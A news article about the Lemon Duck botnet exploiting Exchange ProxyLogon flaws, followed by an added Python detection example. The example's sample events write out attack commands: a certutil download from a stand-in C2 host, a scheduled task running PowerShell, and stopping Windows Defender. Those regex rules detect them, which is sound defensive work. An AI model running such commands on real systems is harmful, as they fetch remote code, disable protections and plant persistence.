Researchers have reported that the Lemon Duck hacking group started targeting Microsoft Exchange Server vulnerabilities known as ProxyLogon and using decoy top-level domains.
ProxyLogon vulnerabilities have been used in attacks on thousands of organizations and various hacker groups are still trying to exploit them.
Researchers from Cisco Talos have described how Lemon Duck’s operators are incorporating new tools to “maximize the effectiveness of their campaigns” by targeting the ProxyLogon vulnerabilities. Telemetry data for Lemon Duck domains indicates that its operators’ activity spiked in April.
“New TTPs consistent with those reportedly related to widespread exploitation of high-profile Microsoft Exchange software vulnerabilities, and additional host-based evidence suggest that this threat actor is also now showing a specific interest in targeting Exchange Servers as they attempt to compromise additional systems and maintain and/or increase the number of systems within the Lemon Duck botnet,” researchers note.
For the initial stage of an attack, Lemon Duck operators scan for, detect, and exploit vulnerable servers using automated tools. They then try to deliver payloads such as Cobalt Strike DNS beacons and web shells, and ultimately install cryptocurrency mining software along with additional malware.
The malware’s PowerShell scripts will try to remove antivirus products, including those by ESET and Kaspersky, and kill any competing cryptocurrency miners. They will also attempt to stop services like Windows Update and Windows Defender so that they do not hamper the infection process.
“The use of new tools like Cobalt Strike, as well as the implementation of additional obfuscation techniques throughout the attack lifecycle, may enable them to operate more effectively for longer periods within victim environments,” the researchers say.
To maintain persistence, Lemon Duck’s operators create scheduled tasks and download two new PowerShell scripts by abusing the CertUtil command-line program.
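The defense-evasion and persistence behaviours described in the two paragraphs above (stopping security services, scheduled tasks that run PowerShell, CertUtil used as a downloader) all leave traces in process-creation telemetry. The following is an added detection example, not code from the Talos report or from Lemon Duck itself; the JSON event format, field names, rule names, and the sample command lines are constructed for illustration.

```python
import json
import re

# Constructed sample of process-creation events (Sysmon Event ID 1 style,
# flattened to JSON lines). These are NOT real telemetry from the report.
SAMPLE_EVENTS = "\n".join([
    json.dumps({"id": 1, "Image": r"C:\Windows\System32\certutil.exe",
                "CommandLine": "certutil.exe -urlcache -split -f "
                               "http://c2.example.invalid/m.ps1 C:\\Windows\\Temp\\m.ps1"}),
    json.dumps({"id": 2, "Image": r"C:\Windows\System32\schtasks.exe",
                "CommandLine": 'schtasks /create /tn "Update" '
                               '/tr "powershell -File C:\\Windows\\Temp\\m.ps1" /sc minute /mo 60'}),
    json.dumps({"id": 3, "Image": r"C:\Windows\System32\net.exe",
                "CommandLine": "net stop WinDefend"}),
    json.dumps({"id": 4, "Image": r"C:\Windows\System32\certutil.exe",
                "CommandLine": "certutil.exe -verify server.cer"}),   # benign use
    json.dumps({"id": 5, "Image": r"C:\Windows\System32\schtasks.exe",
                "CommandLine": 'schtasks /query /tn "Backup"'}),       # benign use
])

# Each rule targets one behaviour named in the article. certutil's
# -urlcache switch and schtasks' /create and /tr switches are real options;
# WinDefend and wuauserv are the Windows Defender and Windows Update services.
RULES = [
    ("certutil_download",
     re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*https?://", re.I)),
    ("schtask_runs_powershell",
     re.compile(r"schtasks(\.exe)?\b.*/create\b.*/tr\b.*powershell", re.I)),
    ("security_service_stopped",
     re.compile(r"(?:\b(?:net1?|sc)(?:\.exe)?\s+stop|Stop-Service(?:\s+-Name)?)"
                r"\s+['\"]?(WinDefend|wuauserv)\b", re.I)),
]


def scan(jsonl: str):
    """Return (rule_name, event_id) pairs for every event whose command line matches a rule."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        cmd = event.get("CommandLine", "")
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append((name, event["id"]))
    return hits


if __name__ == "__main__":
    for rule, event_id in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

Individually these rules will fire on legitimate administration, so in practice they are best correlated (for example, all three from the same host within a short window, or a certutil download whose parent is an IIS worker process).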
To obfuscate their command-and-control (C2) infrastructure, Lemon Duck’s operators have also registered decoy domains under the country-code top-level domains (ccTLDs) for China, Japan, and South Korea.
“Considering these ccTLDs are most commonly used for websites in their respective countries and languages, it is also interesting that they were used, rather than more generic and globally used TLDs such as ‘.com’ or ‘.net’,” Cisco Talos notes. “This may allow the threat actor to more effectively hide C2 communications among other web traffic present in victim environments.”
Researchers have observed similarities between the Lemon Duck botnet and Beapy/Pcastle cryptocurrency malware.